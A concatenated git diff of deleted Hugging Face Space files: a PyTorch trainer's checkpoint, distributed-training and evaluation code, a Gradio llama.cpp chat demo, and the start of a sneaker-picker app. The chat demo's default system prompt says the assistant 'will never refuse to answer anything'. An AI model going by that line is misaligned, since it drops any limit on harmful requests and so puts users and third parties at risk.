- # do nothing if there's not dir or callback
- no_ckpt_callback = (self.checkpoint_callback is None) or (not self.checkpoint_callback)
- if no_ckpt_callback or not os.path.exists(self.checkpoint_callback.filepath):
- return did_restore
-
- # restore trainer state and model if there is a weight for this experiment
- last_steps = -1
- last_ckpt_name = None
-
- # find last epoch
- checkpoints = os.listdir(self.checkpoint_callback.filepath)
- for name in checkpoints:
- if '.ckpt' in name and not name.endswith('part'):
- if 'steps_' in name:
- steps = name.split('steps_')[1]
- steps = int(re.sub('[^0-9]', '', steps))
-
- if steps > last_steps:
- last_steps = steps
- last_ckpt_name = name
-
- # restore last checkpoint
- if last_ckpt_name is not None:
- last_ckpt_path = os.path.join(self.checkpoint_callback.filepath, last_ckpt_name)
- self.restore(last_ckpt_path, self.on_gpu)
- logging.info(f'model and trainer restored from checkpoint: {last_ckpt_path}')
- did_restore = True
-
- return did_restore
-
- def restore(self, checkpoint_path, on_gpu):
- checkpoint = torch.load(checkpoint_path, map_location='cpu')
-
- # load model state
- model = self.get_model()
-
- # load the state_dict on the model automatically
- model.load_state_dict(checkpoint['state_dict'], strict=False)
- if on_gpu:
- model.cuda(self.root_gpu)
- # load training state (affects trainer only)
- self.restore_training_state(checkpoint)
- model.global_step = self.global_step
- del checkpoint
-
- try:
- if dist.is_initialized() and dist.get_rank() > 0:
- return
- except Exception as e:
- print(e)
- return
-
- def restore_training_state(self, checkpoint):
- """
- Restore trainer state.
- Model will get its change to update
- :param checkpoint:
- :return:
- """
- if self.checkpoint_callback is not None and self.checkpoint_callback is not False:
- self.checkpoint_callback.best = checkpoint['checkpoint_callback_best']
-
- self.global_step = checkpoint['global_step']
- self.current_epoch = checkpoint['epoch']
-
- if self.testing:
- return
-
- # restore the optimizers
- optimizer_states = checkpoint['optimizer_states']
- for optimizer, opt_state in zip(self.optimizers, optimizer_states):
- if optimizer is None:
- return
- optimizer.load_state_dict(opt_state)
-
- # move optimizer to GPU 1 weight at a time
- # avoids OOM
- if self.root_gpu is not None:
- for state in optimizer.state.values():
- for k, v in state.items():
- if isinstance(v, torch.Tensor):
- state[k] = v.cuda(self.root_gpu)
-
- # restore the lr schedulers
- lr_schedulers = checkpoint['lr_schedulers']
- for scheduler, lrs_state in zip(self.lr_schedulers, lr_schedulers):
- scheduler.load_state_dict(lrs_state)
-
- # --------------------
- # MODEL SAVE CHECKPOINT
- # --------------------
- def _atomic_save(self, checkpoint, filepath):
- """Saves a checkpoint atomically, avoiding the creation of incomplete checkpoints.
-
- This will create a temporary checkpoint with a suffix of ``.part``, then copy it to the final location once
- saving is finished.
-
- Args:
- checkpoint (object): The object to save.
- Built to be used with the ``dump_checkpoint`` method, but can deal with anything which ``torch.save``
- accepts.
- filepath (str|pathlib.Path): The path to which the checkpoint will be saved.
- This points to the file that the checkpoint will be stored in.
- """
- tmp_path = str(filepath) + ".part"
- torch.save(checkpoint, tmp_path)
- os.replace(tmp_path, filepath)
-
- def save_checkpoint(self, filepath):
- checkpoint = self.dump_checkpoint()
- self._atomic_save(checkpoint, filepath)
-
- def dump_checkpoint(self):
-
- checkpoint = {
- 'epoch': self.current_epoch,
- 'global_step': self.global_step
- }
-
- if self.checkpoint_callback is not None and self.checkpoint_callback is not False:
- checkpoint['checkpoint_callback_best'] = self.checkpoint_callback.best
-
- # save optimizers
- optimizer_states = []
- for i, optimizer in enumerate(self.optimizers):
- if optimizer is not None:
- optimizer_states.append(optimizer.state_dict())
-
- checkpoint['optimizer_states'] = optimizer_states
-
- # save lr schedulers
- lr_schedulers = []
- for i, scheduler in enumerate(self.lr_schedulers):
- lr_schedulers.append(scheduler.state_dict())
-
- checkpoint['lr_schedulers'] = lr_schedulers
-
- # add the hparams and state_dict from the model
- model = self.get_model()
- checkpoint['state_dict'] = model.state_dict()
- # give the model a chance to add a few things
- model.on_save_checkpoint(checkpoint)
-
- return checkpoint
-
- def copy_trainer_model_properties(self, model):
- if isinstance(model, DP):
- ref_model = model.module
- elif isinstance(model, DDP):
- ref_model = model.module
- else:
- ref_model = model
-
- for m in [model, ref_model]:
- m.trainer = self
- m.on_gpu = self.on_gpu
- m.use_dp = self.use_dp
- m.use_ddp = self.use_ddp
- m.testing = self.testing
- m.single_gpu = self.single_gpu
-
- def transfer_batch_to_gpu(self, batch, gpu_id):
- # base case: object can be directly moved using `cuda` or `to`
- if callable(getattr(batch, 'cuda', None)):
- return batch.cuda(gpu_id, non_blocking=True)
-
- elif callable(getattr(batch, 'to', None)):
- return batch.to(torch.device('cuda', gpu_id), non_blocking=True)
-
- # when list
- elif isinstance(batch, list):
- for i, x in enumerate(batch):
- batch[i] = self.transfer_batch_to_gpu(x, gpu_id)
- return batch
-
- # when tuple
- elif isinstance(batch, tuple):
- batch = list(batch)
- for i, x in enumerate(batch):
- batch[i] = self.transfer_batch_to_gpu(x, gpu_id)
- return tuple(batch)
-
- # when dict
- elif isinstance(batch, dict):
- for k, v in batch.items():
- batch[k] = self.transfer_batch_to_gpu(v, gpu_id)
-
- return batch
-
- # nothing matches, return the value as is without transform
- return batch
-
- def set_distributed_mode(self, distributed_backend):
- # skip for CPU
- if self.num_gpus == 0:
- return
-
- # single GPU case
- # in single gpu case we allow ddp so we can train on multiple
- # nodes, 1 gpu per node
- elif self.num_gpus == 1:
- self.single_gpu = True
- self.use_dp = False
- self.use_ddp = False
- self.root_gpu = 0
- self.data_parallel_device_ids = [0]
- else:
- if distributed_backend is not None:
- self.use_dp = distributed_backend == 'dp'
- self.use_ddp = distributed_backend == 'ddp'
- elif distributed_backend is None:
- self.use_dp = True
- self.use_ddp = False
-
- logging.info(f'gpu available: {torch.cuda.is_available()}, used: {self.on_gpu}')
-
- def ddp_train(self, gpu_idx, model):
- """
- Entry point into a DP thread
- :param gpu_idx:
- :param model:
- :param cluster_obj:
- :return:
- """
- # otherwise default to node rank 0
- self.node_rank = 0
-
- # show progressbar only on progress_rank 0
- self.show_progress_bar = self.show_progress_bar and self.node_rank == 0 and gpu_idx == 0
-
- # determine which process we are and world size
- if self.use_ddp:
- self.proc_rank = self.node_rank * self.num_gpus + gpu_idx
- self.world_size = self.num_gpus
-
- # let the exp know the rank to avoid overwriting logs
- if self.logger is not None:
- self.logger.rank = self.proc_rank
-
- # set up server using proc 0's ip address
- # try to init for 20 times at max in case ports are taken
- # where to store ip_table
- model.trainer = self
- model.init_ddp_connection(self.proc_rank, self.world_size)
-
- # CHOOSE OPTIMIZER
- # allow for lr schedulers as well
- model.model = model.build_model()
- if not self.testing:
- self.optimizers, self.lr_schedulers = self.init_optimizers(model.configure_optimizers())
-
- # MODEL
- # copy model to each gpu
- if self.distributed_backend == 'ddp':
- torch.cuda.set_device(gpu_idx)
- model.cuda(gpu_idx)
-
- # set model properties before going into wrapper
- self.copy_trainer_model_properties(model)
-
- # override root GPU
- self.root_gpu = gpu_idx
-
- if self.distributed_backend == 'ddp':
- device_ids = [gpu_idx]
- else:
- device_ids = None
-
- # allow user to configure ddp
- model = model.configure_ddp(model, device_ids)
-
- # continue training routine
- self.run_pretrain_routine(model)
-
- def resolve_root_node_address(self, root_node):
- if '[' in root_node:
- name = root_node.split('[')[0]
- number = root_node.split(',')[0]
- if '-' in number:
- number = number.split('-')[0]
-
- number = re.sub('[^0-9]', '', number)
- root_node = name + number
-
- return root_node
-
- def log_metrics(self, metrics, grad_norm_dic, step=None):
- """Logs the metric dict passed in.
-
- :param metrics:
- :param grad_norm_dic:
- """
- # added metrics by Lightning for convenience
- metrics['epoch'] = self.current_epoch
-
- # add norms
- metrics.update(grad_norm_dic)
-
- # turn all tensors to scalars
- scalar_metrics = self.metrics_to_scalars(metrics)
-
- step = step if step is not None else self.global_step
- # log actual metrics
- if self.proc_rank == 0 and self.logger is not None:
- self.logger.log_metrics(scalar_metrics, step=step)
- self.logger.save()
-
- def add_tqdm_metrics(self, metrics):
- for k, v in metrics.items():
- if type(v) is torch.Tensor:
- v = v.item()
-
- self.tqdm_metrics[k] = v
-
- def metrics_to_scalars(self, metrics):
- new_metrics = {}
- for k, v in metrics.items():
- if isinstance(v, torch.Tensor):
- v = v.item()
-
- if type(v) is dict:
- v = self.metrics_to_scalars(v)
-
- new_metrics[k] = v
-
- return new_metrics
-
- def process_output(self, output, train=False):
- """Reduces output according to the training mode.
-
- Separates loss from logging and tqdm metrics
- :param output:
- :return:
- """
- # ---------------
- # EXTRACT CALLBACK KEYS
- # ---------------
- # all keys not progress_bar or log are candidates for callbacks
- callback_metrics = {}
- for k, v in output.items():
- if k not in ['progress_bar', 'log', 'hiddens']:
- callback_metrics[k] = v
-
- if train and self.use_dp:
- num_gpus = self.num_gpus
- callback_metrics = self.reduce_distributed_output(callback_metrics, num_gpus)
-
- for k, v in callback_metrics.items():
- if isinstance(v, torch.Tensor):
- callback_metrics[k] = v.item()
-
- # ---------------
- # EXTRACT PROGRESS BAR KEYS
- # ---------------
- try:
- progress_output = output['progress_bar']
-
- # reduce progress metrics for tqdm when using dp
- if train and self.use_dp:
- num_gpus = self.num_gpus
- progress_output = self.reduce_distributed_output(progress_output, num_gpus)
-
- progress_bar_metrics = progress_output
- except Exception:
- progress_bar_metrics = {}
-
- # ---------------
- # EXTRACT LOGGING KEYS
- # ---------------
- # extract metrics to log to experiment
- try:
- log_output = output['log']
-
- # reduce progress metrics for tqdm when using dp
- if train and self.use_dp:
- num_gpus = self.num_gpus
- log_output = self.reduce_distributed_output(log_output, num_gpus)
-
- log_metrics = log_output
- except Exception:
- log_metrics = {}
-
- # ---------------
- # EXTRACT LOSS
- # ---------------
- # if output dict doesn't have the keyword loss
- # then assume the output=loss if scalar
- loss = None
- if train:
- try:
- loss = output['loss']
- except Exception:
- if type(output) is torch.Tensor:
- loss = output
- else:
- raise RuntimeError(
- 'No `loss` value in the dictionary returned from `model.training_step()`.'
- )
-
- # when using dp need to reduce the loss
- if self.use_dp:
- loss = self.reduce_distributed_output(loss, self.num_gpus)
-
- # ---------------
- # EXTRACT HIDDEN
- # ---------------
- hiddens = output.get('hiddens')
-
- # use every metric passed in as a candidate for callback
- callback_metrics.update(progress_bar_metrics)
- callback_metrics.update(log_metrics)
-
- # convert tensors to numpy
- for k, v in callback_metrics.items():
- if isinstance(v, torch.Tensor):
- callback_metrics[k] = v.item()
-
- return loss, progress_bar_metrics, log_metrics, callback_metrics, hiddens
-
- def reduce_distributed_output(self, output, num_gpus):
- if num_gpus <= 1:
- return output
-
- # when using DP, we get one output per gpu
- # average outputs and return
- if type(output) is torch.Tensor:
- return output.mean()
-
- for k, v in output.items():
- # recurse on nested dics
- if isinstance(output[k], dict):
- output[k] = self.reduce_distributed_output(output[k], num_gpus)
-
- # do nothing when there's a scalar
- elif isinstance(output[k], torch.Tensor) and output[k].dim() == 0:
- pass
-
- # reduce only metrics that have the same number of gpus
- elif output[k].size(0) == num_gpus:
- reduced = torch.mean(output[k])
- output[k] = reduced
- return output
-
- def clip_gradients(self):
- if self.gradient_clip_val > 0:
- model = self.get_model()
- torch.nn.utils.clip_grad_norm_(model.parameters(), self.gradient_clip_val)
-
- def print_nan_gradients(self):
- model = self.get_model()
- for param in model.parameters():
- if (param.grad is not None) and torch.isnan(param.grad.float()).any():
- logging.info(param, param.grad)
-
- def configure_accumulated_gradients(self, accumulate_grad_batches):
- self.accumulate_grad_batches = None
-
- if isinstance(accumulate_grad_batches, dict):
- self.accumulation_scheduler = GradientAccumulationScheduler(accumulate_grad_batches)
- elif isinstance(accumulate_grad_batches, int):
- schedule = {1: accumulate_grad_batches}
- self.accumulation_scheduler = GradientAccumulationScheduler(schedule)
- else:
- raise TypeError("Gradient accumulation supports only int and dict types")
-
- def get_dataloaders(self, model):
- if not self.testing:
- self.init_train_dataloader(model)
- self.init_val_dataloader(model)
- else:
- self.init_test_dataloader(model)
-
- if self.use_ddp:
- dist.barrier()
- if not self.testing:
- self.get_train_dataloader()
- self.get_val_dataloaders()
- else:
- self.get_test_dataloaders()
-
- def init_train_dataloader(self, model):
- self.fisrt_epoch = True
- self.get_train_dataloader = model.train_dataloader
- if isinstance(self.get_train_dataloader(), torch.utils.data.DataLoader):
- self.num_training_batches = len(self.get_train_dataloader())
- self.num_training_batches = int(self.num_training_batches)
- else:
- self.num_training_batches = float('inf')
- self.is_iterable_train_dataloader = True
- if isinstance(self.val_check_interval, int):
- self.val_check_batch = self.val_check_interval
- else:
- self._percent_range_check('val_check_interval')
- self.val_check_batch = int(self.num_training_batches * self.val_check_interval)
- self.val_check_batch = max(1, self.val_check_batch)
-
- def init_val_dataloader(self, model):
- self.get_val_dataloaders = model.val_dataloader
- self.num_val_batches = 0
- if self.get_val_dataloaders() is not None:
- if isinstance(self.get_val_dataloaders()[0], torch.utils.data.DataLoader):
- self.num_val_batches = sum(len(dataloader) for dataloader in self.get_val_dataloaders())
- self.num_val_batches = int(self.num_val_batches)
- else:
- self.num_val_batches = float('inf')
-
- def init_test_dataloader(self, model):
- self.get_test_dataloaders = model.test_dataloader
- if self.get_test_dataloaders() is not None:
- if isinstance(self.get_test_dataloaders()[0], torch.utils.data.DataLoader):
- self.num_test_batches = sum(len(dataloader) for dataloader in self.get_test_dataloaders())
- self.num_test_batches = int(self.num_test_batches)
- else:
- self.num_test_batches = float('inf')
-
- def evaluate(self, model, dataloaders, max_batches, test=False):
- """Run evaluation code.
-
- :param model: PT model
- :param dataloaders: list of PT dataloaders
- :param max_batches: Scalar
- :param test: boolean
- :return:
- """
- # enable eval mode
- model.zero_grad()
- model.eval()
-
- # copy properties for forward overrides
- self.copy_trainer_model_properties(model)
-
- # disable gradients to save memory
- torch.set_grad_enabled(False)
-
- if test:
- self.get_model().test_start()
- # bookkeeping
- outputs = []
-
- # run training
- for dataloader_idx, dataloader in enumerate(dataloaders):
- dl_outputs = []
- for batch_idx, batch in enumerate(dataloader):
-
- if batch is None: # pragma: no cover
- continue
-
- # stop short when on fast_dev_run (sets max_batch=1)
- if batch_idx >= max_batches:
- break
-
- # -----------------
- # RUN EVALUATION STEP
- # -----------------
- output = self.evaluation_forward(model,
- batch,
- batch_idx,
- dataloader_idx,
- test)
-
- # track outputs for collation
- dl_outputs.append(output)
-
- # batch done
- if test:
- self.test_progress_bar.update(1)
- else:
- self.val_progress_bar.update(1)
- outputs.append(dl_outputs)
-
- # with a single dataloader don't pass an array
- if len(dataloaders) == 1:
- outputs = outputs[0]
-
- # give model a chance to do something with the outputs (and method defined)
- model = self.get_model()
- if test:
- eval_results_ = model.test_end(outputs)
- else:
- eval_results_ = model.validation_end(outputs)
- eval_results = eval_results_
-
- # enable train mode again
- model.train()
-
- # enable gradients to save memory
- torch.set_grad_enabled(True)
-
- return eval_results
-
- def run_evaluation(self, test=False):
- # when testing make sure user defined a test step
- model = self.get_model()
- model.on_pre_performance_check()
-
- # select dataloaders
- if test:
- dataloaders = self.get_test_dataloaders()
- max_batches = self.num_test_batches
- else:
- # val
- dataloaders = self.get_val_dataloaders()
- max_batches = self.num_val_batches
-
- # init validation or test progress bar
- # main progress bar will already be closed when testing so initial position is free
- position = 2 * self.process_position + (not test)
- desc = 'Testing' if test else 'Validating'
- pbar = tqdm.tqdm(desc=desc, total=max_batches, leave=test, position=position,
- disable=not self.show_progress_bar, dynamic_ncols=True,
- unit='batch', file=sys.stdout)
- setattr(self, f'{"test" if test else "val"}_progress_bar', pbar)
-
- # run evaluation
- eval_results = self.evaluate(self.model,
- dataloaders,
- max_batches,
- test)
- if eval_results is not None:
- _, prog_bar_metrics, log_metrics, callback_metrics, _ = self.process_output(
- eval_results)
-
- # add metrics to prog bar
- self.add_tqdm_metrics(prog_bar_metrics)
-
- # log metrics
- self.log_metrics(log_metrics, {})
-
- # track metrics for callbacks
- self.callback_metrics.update(callback_metrics)
-
- # hook
- model.on_post_performance_check()
-
- # add model specific metrics
- tqdm_metrics = self.training_tqdm_dict
- if not test:
- self.main_progress_bar.set_postfix(**tqdm_metrics)
-
- # close progress bar
- if test:
- self.test_progress_bar.close()
- else:
- self.val_progress_bar.close()
-
- # model checkpointing
- if self.proc_rank == 0 and self.checkpoint_callback is not None and not test:
- self.checkpoint_callback.on_epoch_end(epoch=self.current_epoch,
- logs=self.callback_metrics)
-
- def evaluation_forward(self, model, batch, batch_idx, dataloader_idx, test=False):
- # make dataloader_idx arg in validation_step optional
- args = [batch, batch_idx]
-
- if test and len(self.get_test_dataloaders()) > 1:
- args.append(dataloader_idx)
-
- elif not test and len(self.get_val_dataloaders()) > 1:
- args.append(dataloader_idx)
-
- # handle DP, DDP forward
- if self.use_ddp or self.use_dp:
- output = model(*args)
- return output
-
- # single GPU
- if self.single_gpu:
- # for single GPU put inputs on gpu manually
- root_gpu = 0
- if isinstance(self.data_parallel_device_ids, list):
- root_gpu = self.data_parallel_device_ids[0]
- batch = self.transfer_batch_to_gpu(batch, root_gpu)
- args[0] = batch
-
- # CPU
- if test:
- output = model.test_step(*args)
- else:
- output = model.validation_step(*args)
-
- return output
-
- def train(self):
- model = self.get_model()
- # run all epochs
- for epoch in range(self.current_epoch, 1000000):
- # set seed for distributed sampler (enables shuffling for each epoch)
- if self.use_ddp and hasattr(self.get_train_dataloader().sampler, 'set_epoch'):
- self.get_train_dataloader().sampler.set_epoch(epoch)
-
- # get model
- model = self.get_model()
-
- # update training progress in trainer and model
- model.current_epoch = epoch
- self.current_epoch = epoch
-
- total_val_batches = 0
- if not self.disable_validation:
- # val can be checked multiple times in epoch
- is_val_epoch = (self.current_epoch + 1) % self.check_val_every_n_epoch == 0
- val_checks_per_epoch = self.num_training_batches // self.val_check_batch
- val_checks_per_epoch = val_checks_per_epoch if is_val_epoch else 0
- total_val_batches = self.num_val_batches * val_checks_per_epoch
-
- # total batches includes multiple val checks
- self.total_batches = self.num_training_batches + total_val_batches
- self.batch_loss_value = 0 # accumulated grads
-
- if self.is_iterable_train_dataloader:
- # for iterable train loader, the progress bar never ends
- num_iterations = None
- else:
- num_iterations = self.total_batches
-
- # reset progress bar
- # .reset() doesn't work on disabled progress bar so we should check
- desc = f'Epoch {epoch + 1}' if not self.is_iterable_train_dataloader else ''
- self.main_progress_bar.set_description(desc)
-
- # changing gradient according accumulation_scheduler
- self.accumulation_scheduler.on_epoch_begin(epoch, self)
-
- # -----------------
- # RUN TNG EPOCH
- # -----------------
- self.run_training_epoch()
-
- # update LR schedulers
- if self.lr_schedulers is not None:
- for lr_scheduler in self.lr_schedulers:
- lr_scheduler.step(epoch=self.current_epoch)
-
- self.main_progress_bar.close()
-
- model.on_train_end()
-
- if self.logger is not None:
- self.logger.finalize("success")
-
- def run_training_epoch(self):
- # before epoch hook
- if self.is_function_implemented('on_epoch_start'):
- model = self.get_model()
- model.on_epoch_start()
-
- # run epoch
- for batch_idx, batch in enumerate(self.get_train_dataloader()):
- # stop epoch if we limited the number of training batches
- if batch_idx >= self.num_training_batches:
- break
-
- self.batch_idx = batch_idx
-
- model = self.get_model()
- model.global_step = self.global_step
-
- # ---------------
- # RUN TRAIN STEP
- # ---------------
- output = self.run_training_batch(batch, batch_idx)
- batch_result, grad_norm_dic, batch_step_metrics = output
-
- # when returning -1 from train_step, we end epoch early
- early_stop_epoch = batch_result == -1
-
- # ---------------
- # RUN VAL STEP
- # ---------------
- should_check_val = (
- not self.disable_validation and self.global_step % self.val_check_batch == 0 and not self.fisrt_epoch)
- self.fisrt_epoch = False
-
- if should_check_val:
- self.run_evaluation(test=self.testing)
-
- # when logs should be saved
- should_save_log = (batch_idx + 1) % self.log_save_interval == 0 or early_stop_epoch
- if should_save_log:
- if self.proc_rank == 0 and self.logger is not None:
- self.logger.save()
-
- # when metrics should be logged
- should_log_metrics = batch_idx % self.row_log_interval == 0 or early_stop_epoch
- if should_log_metrics:
- # logs user requested information to logger
- self.log_metrics(batch_step_metrics, grad_norm_dic)
-
- self.global_step += 1
- self.total_batch_idx += 1
-
- # end epoch early
- # stop when the flag is changed or we've gone past the amount
- # requested in the batches
- if early_stop_epoch:
- break
- if self.global_step > self.max_updates:
- print("| Training end..")
- exit()
-
- # epoch end hook
- if self.is_function_implemented('on_epoch_end'):
- model = self.get_model()
- model.on_epoch_end()
-
- def run_training_batch(self, batch, batch_idx):
- # track grad norms
- grad_norm_dic = {}
-
- # track all metrics for callbacks
- all_callback_metrics = []
-
- # track metrics to log
- all_log_metrics = []
-
- if batch is None:
- return 0, grad_norm_dic, {}
-
- # hook
- if self.is_function_implemented('on_batch_start'):
- model_ref = self.get_model()
- response = model_ref.on_batch_start(batch)
-
- if response == -1:
- return -1, grad_norm_dic, {}
-
- splits = [batch]
- self.hiddens = None
- for split_idx, split_batch in enumerate(splits):
- self.split_idx = split_idx
-
- # call training_step once per optimizer
- for opt_idx, optimizer in enumerate(self.optimizers):
- if optimizer is None:
- continue
- # make sure only the gradients of the current optimizer's paramaters are calculated
- # in the training step to prevent dangling gradients in multiple-optimizer setup.
- if len(self.optimizers) > 1:
- for param in self.get_model().parameters():
- param.requires_grad = False
- for group in optimizer.param_groups:
- for param in group['params']:
- param.requires_grad = True
-
- # wrap the forward step in a closure so second order methods work
- def optimizer_closure():
- # forward pass
- output = self.training_forward(
- split_batch, batch_idx, opt_idx, self.hiddens)
-
- closure_loss = output[0]
- progress_bar_metrics = output[1]
- log_metrics = output[2]
- callback_metrics = output[3]
- self.hiddens = output[4]
- if closure_loss is None:
- return None
-
- # accumulate loss
- # (if accumulate_grad_batches = 1 no effect)
- closure_loss = closure_loss / self.accumulate_grad_batches
-
- # backward pass
- model_ref = self.get_model()
- if closure_loss.requires_grad:
- model_ref.backward(closure_loss, optimizer)
-
- # track metrics for callbacks
- all_callback_metrics.append(callback_metrics)
-
- # track progress bar metrics
- self.add_tqdm_metrics(progress_bar_metrics)
- all_log_metrics.append(log_metrics)
-
- # insert after step hook
- if self.is_function_implemented('on_after_backward'):
- model_ref = self.get_model()
- model_ref.on_after_backward()
-
- return closure_loss
-
- # calculate loss
- loss = optimizer_closure()
- if loss is None:
- continue
-
- # nan grads
- if self.print_nan_grads:
- self.print_nan_gradients()
-
- # track total loss for logging (avoid mem leaks)
- self.batch_loss_value += loss.item()
-
- # gradient update with accumulated gradients
- if (self.batch_idx + 1) % self.accumulate_grad_batches == 0:
-
- # track gradient norms when requested
- if batch_idx % self.row_log_interval == 0:
- if self.track_grad_norm > 0:
- model = self.get_model()
- grad_norm_dic = model.grad_norm(
- self.track_grad_norm)
-
- # clip gradients
- self.clip_gradients()
-
- # calls .step(), .zero_grad()
- # override function to modify this behavior
- model = self.get_model()
- model.optimizer_step(self.current_epoch, batch_idx, optimizer, opt_idx)
-
- # calculate running loss for display
- self.running_loss.append(self.batch_loss_value)
- self.batch_loss_value = 0
- self.avg_loss = np.mean(self.running_loss[-100:])
-
- # activate batch end hook
- if self.is_function_implemented('on_batch_end'):
- model = self.get_model()
- model.on_batch_end()
-
- # update progress bar
- self.main_progress_bar.update(1)
- self.main_progress_bar.set_postfix(**self.training_tqdm_dict)
-
- # collapse all metrics into one dict
- all_log_metrics = {k: v for d in all_log_metrics for k, v in d.items()}
-
- # track all metrics for callbacks
- self.callback_metrics.update({k: v for d in all_callback_metrics for k, v in d.items()})
-
- return 0, grad_norm_dic, all_log_metrics
-
- def training_forward(self, batch, batch_idx, opt_idx, hiddens):
- """
- Handle forward for each training case (distributed, single gpu, etc...)
- :param batch:
- :param batch_idx:
- :return:
- """
- # ---------------
- # FORWARD
- # ---------------
- # enable not needing to add opt_idx to training_step
- args = [batch, batch_idx, opt_idx]
-
- # distributed forward
- if self.use_ddp or self.use_dp:
- output = self.model(*args)
- # single GPU forward
- elif self.single_gpu:
- gpu_id = 0
- if isinstance(self.data_parallel_device_ids, list):
- gpu_id = self.data_parallel_device_ids[0]
- batch = self.transfer_batch_to_gpu(copy.copy(batch), gpu_id)
- args[0] = batch
- output = self.model.training_step(*args)
- # CPU forward
- else:
- output = self.model.training_step(*args)
-
- # allow any mode to define training_end
- model_ref = self.get_model()
- output_ = model_ref.training_end(output)
- if output_ is not None:
- output = output_
-
- # format and reduce outputs accordingly
- output = self.process_output(output, train=True)
-
- return output
-
- # ---------------
- # Utils
- # ---------------
- def is_function_implemented(self, f_name):
- model = self.get_model()
- f_op = getattr(model, f_name, None)
- return callable(f_op)
-
- def _percent_range_check(self, name):
- value = getattr(self, name)
- msg = f"`{name}` must lie in the range [0.0, 1.0], but got {value:.3f}."
- if name == "val_check_interval":
- msg += " If you want to disable validation set `val_percent_check` to 0.0 instead."
-
- if not 0. <= value <= 1.:
- raise ValueError(msg)
diff --git a/spaces/RoversX/Nous-Hermes-Llama-2-7B-GGML/tabbed.py b/spaces/RoversX/Nous-Hermes-Llama-2-7B-GGML/tabbed.py
deleted file mode 100644
index 2e6cb8337a48689eef48835bbc094696d4485c6e..0000000000000000000000000000000000000000
--- a/spaces/RoversX/Nous-Hermes-Llama-2-7B-GGML/tabbed.py
+++ /dev/null
@@ -1,140 +0,0 @@
-import gradio as gr
-import yaml
-from huggingface_hub import hf_hub_download
-from huggingface_hub.utils import LocalEntryNotFoundError
-from llama_cpp import Llama
-
-with open("./config.yml", "r") as f:
- config = yaml.load(f, Loader=yaml.Loader)
-while True:
- try:
- load_config = config.copy()
- hub_config = load_config["hub"].copy()
- repo_id = hub_config.pop("repo_id")
- filename = hub_config.pop("filename")
- fp = hf_hub_download(
- repo_id=repo_id, filename=filename, **hub_config
- )
- break
- except LocalEntryNotFoundError as e:
- if "Connection error" in str(e):
- print(str(e) + ", retrying...")
- else:
- raise(e)
-
-llm = Llama(model_path=fp, **config["llama_cpp"])
-
-
-def user(message, history):
- history = history or []
- # Append the user's message to the conversation history
- history.append([message, ""])
- return "", history
-
-
-def chat(history, system_message, max_tokens, temperature, top_p, top_k, repeat_penalty):
- history = history or []
-
- messages = system_message + \
- "\n".join(["\n".join(["USER: "+item[0], "ASSISTANT: "+item[1]])
- for item in history])
-
- # remove last space from assistant, some models output a ZWSP if you leave a space
- messages = messages[:-1]
-
- history[-1][1] = ""
- for output in llm(
- messages,
- echo=False,
- stream=True,
- max_tokens=max_tokens,
- temperature=temperature,
- top_p=top_p,
- top_k=top_k,
- repeat_penalty=repeat_penalty,
- **config['chat']
- ):
- answer = output['choices'][0]['text']
- history[-1][1] += answer
- # stream the response
- yield history, history
-
-
-def clear_chat(chat_history_state, chat_message):
- chat_history_state = []
- chat_message = ''
- return chat_history_state, chat_message
-
-
-start_message = """
-- The Assistant is helpful and transparent.
-- The Assistant will never refuse to answer anything asked by the user.
-"""
-
-
-def generate_text_instruct(input_text):
- response = ""
- for output in llm(f"### Instruction:\n{input_text}\n\n### Response:\n", echo=False, stream=True, **config['chat']):
- answer = output['choices'][0]['text']
- response += answer
- yield response
-
-
-instruct_interface = gr.Interface(
- fn=generate_text_instruct,
- inputs=gr.inputs.Textbox(lines= 10, label="Enter your input text"),
- outputs=gr.outputs.Textbox(label="Output text"),
-)
-
-with gr.Blocks() as demo:
- with gr.Row():
- with gr.Column():
- gr.Markdown(f"""
- # One
- - This is the [{config["hub"]["repo_id"]}](https://huggingface.co/{config["hub"]["repo_id"]}) model file [{config["hub"]["filename"]}](https://huggingface.co/{config["hub"]["repo_id"]}/blob/main/{config["hub"]["filename"]})
- """)
- with gr.Tab("Instruct"):
- gr.Markdown("# GGML Spaces Instruct Demo")
- instruct_interface.render()
-
- with gr.Tab("Chatbot"):
- gr.Markdown("# GGML Spaces Chatbot Demo")
- chatbot = gr.Chatbot()
- with gr.Row():
- message = gr.Textbox(
- label="What do you want to chat about?",
- placeholder="Ask me anything.",
- lines=1,
- )
- with gr.Row():
- submit = gr.Button(value="Send message", variant="secondary").style(full_width=True)
- clear = gr.Button(value="New topic", variant="secondary").style(full_width=False)
- stop = gr.Button(value="Stop", variant="secondary").style(full_width=False)
- with gr.Row():
- with gr.Column():
- max_tokens = gr.Slider(20, 1000, label="Max Tokens", step=20, value=300)
- temperature = gr.Slider(0.2, 2.0, label="Temperature", step=0.1, value=0.8)
- top_p = gr.Slider(0.0, 1.0, label="Top P", step=0.05, value=0.95)
- top_k = gr.Slider(0, 100, label="Top K", step=1, value=40)
- repeat_penalty = gr.Slider(0.0, 2.0, label="Repetition Penalty", step=0.1, value=1.1)
-
- system_msg = gr.Textbox(
- start_message, label="System Message", interactive=True, visible=True, placeholder="system prompt, useful for RP", lines=5)
-
- chat_history_state = gr.State()
- clear.click(clear_chat, inputs=[chat_history_state, message], outputs=[chat_history_state, message], queue=False)
- clear.click(lambda: None, None, chatbot, queue=False)
-
- submit_click_event = submit.click(
- fn=user, inputs=[message, chat_history_state], outputs=[message, chat_history_state], queue=True
- ).then(
- fn=chat, inputs=[chat_history_state, system_msg, max_tokens, temperature, top_p, top_k, repeat_penalty], outputs=[chatbot, chat_history_state], queue=True
- )
- message_submit_event = message.submit(
- fn=user, inputs=[message, chat_history_state], outputs=[message, chat_history_state], queue=True
- ).then(
- fn=chat, inputs=[chat_history_state, system_msg, max_tokens, temperature, top_p, top_k, repeat_penalty], outputs=[chatbot, chat_history_state], queue=True
- )
- stop.click(fn=None, inputs=None, outputs=None, cancels=[submit_click_event, message_submit_event], queue=False)
-
-demo.queue(**config["queue"]).launch(debug=True, server_name="0.0.0.0", server_port=7860)
diff --git a/spaces/SNKRWRLD/SNKR_WRLD_Shoe_Picker/app.py b/spaces/SNKRWRLD/SNKR_WRLD_Shoe_Picker/app.py
deleted file mode 100644
index b8e324b9c29780cc194b84219d4782bd519931d7..0000000000000000000000000000000000000000
--- a/spaces/SNKRWRLD/SNKR_WRLD_Shoe_Picker/app.py
+++ /dev/null
@@ -1,172 +0,0 @@
-### ----------------------------- ###
-### libraries ###
-### ----------------------------- ###
-
-import gradio as gr
-import pandas as pd
-import numpy as np
-from sklearn.model_selection import train_test_split
-from sklearn.linear_model import LogisticRegression
